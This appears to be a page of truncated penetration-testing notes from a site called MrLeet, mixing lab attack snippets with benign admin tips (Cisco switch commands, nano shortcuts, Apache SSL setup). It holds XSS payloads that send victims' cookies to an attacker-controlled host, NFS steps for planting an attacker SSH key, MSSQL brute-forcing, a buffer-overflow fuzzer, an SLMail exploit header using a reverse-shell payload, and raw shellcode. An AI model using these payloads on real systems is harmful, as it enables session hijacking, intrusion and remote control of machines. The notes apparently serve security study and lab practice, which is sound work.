Latest notes for PenTesting - MrLeet


MrLeet provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.
By: ajayverma 2019-06-25 11:08:19

[+] Cookie Stealing:

[-] Start Web Service

python -m SimpleHTTPServer 80

[-] Use one of the following XSS payloads:

<script>document.location="http://192.168.0.60/?c="+document.cookie;</script>
<script>new Image().src="http://192.168.0.60/index.php?c="+document.cookie;</script>...


Score: 0

By: ajayverma 2019-06-25 11:08:23

--- Verify Basic Configuration:

Shows information about the switch and its interfaces, RAM, NVRAM, flash, IOS, etc.
SW1# show version

Shows the current configuration file stored in DRAM.
SW1# show running-config

Shows the configuration file stored in NVRAM, which is used during the boot process.
SW1# show startup-config

Lists the comman...


Score: 0

Title: CTF Notes_1
By: ajayverma 2019-06-25 11:08:26

# Enumerate Users via Finger
finger user@192.168.0.20

# Show nfs shares available
showmount -e 192.168.1.54

# Use nfspysh to mount share and create .ssh directory
nfspysh -o server=192.168.0.20:/home/user
mkdir .ssh
cd .ssh

# Generate ssh key pair
ssh-keygen
cp id_rsa.pub /tmp/authorized_keys

# Transfer attacker public key to ho...


Score: 0

By: ajayverma 2019-06-25 11:08:30

[+] Main tasks:

Any third party installed software and all associated versions.
Password policy applied locally via net accounts commands.
Domain policy applied, including domain password policy.
Logging settings.
Running services and unquoted service paths.
Permissions set on services.
List of patches and hotfixes installed.
Efficacy of ...


Score: 0

By: ajayverma 2019-06-25 11:08:33

[+] nano Shortcuts
ctrl v Next page.
ctrl y Previous page.
ctrl w Where is (find).
ctrl k Cut that line of text.
ctrl x Exit editor.

[+] Create a text file:
touch file Creates an empty file.
ifconfig > tmp pipe the output of a command
nano file

[+] Create a file and append text to it:
ifconfig > tmp
echo &g...


Score: 0

By: ajayverma 2019-06-25 11:08:36

[>] Enumerate MSSQL Servers on the network:

msf > use auxiliary/scanner/mssql/mssql_ping
nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156
Discover more servers using "Browse for More" via Microsoft SQL Server Management Studio.

[>] Bruteforce MSSQL Database:

msf auxiliary(mssql_login) > use auxiliary/scanne...


Score: 0


1. Install OpenSSL

sudo apt-get install openssl

2. Run the following command to generate the self signed SSL certificates:

sudo openssl req -x509 -nodes -days 1095 -newkey rsa:2048 -out /etc/ssl/certs/server.crt -keyout /etc/ssl/private/server.key

3. Enable SSL for Apache

sudo a2enmod ssl

4. Put the default-ssl site available crea...


Score: 0


#!/usr/bin/python
import socket

#create an array of buffers, while incrementing them

buffer=["A"]
counter=100
while len(buffer) <=30:
    buffer.append("A"*counter)
    counter=counter+200

for string in buffer:
    print "Fuzzing PASS with %s bytes" % len(string)
    s=socket.socket(socket.AF_INET, socket.SOCK_S...


Score: 0


#!/usr/bin/env ruby

=begin
takes advantage of the LONG_PASS buffer overflow vulnerability in SLMAIL.
uses windows/shell_reverse_tcp payload
connects to 10.11.0.155:1234
encoded with 1 pass of x86/shikata_ga_nai
=end

require 'socket'

#bad chars = "\x00\x0a\x0d"
#jmp esp addre...


Score: 0

By: ajayverma 2019-06-25 10:11:42

prefix = "\x41" * 80
eip = "\x42" * 4
nop = "\x90" * (400 - 137)
buf = ""
buf += "\xba\x8a\x2a\xb0\xa4\xd9\xed\xd9\x74\x24\xf4\x5d\x31"
buf += "\xc9\xb1\x1c\x31\x55\x14\x03\x55\x14\x83\xed\xfc\x68"
buf += "\xdf\xda\xd9\x34\xb9\xa9\x25\x7d\x...


Score: 0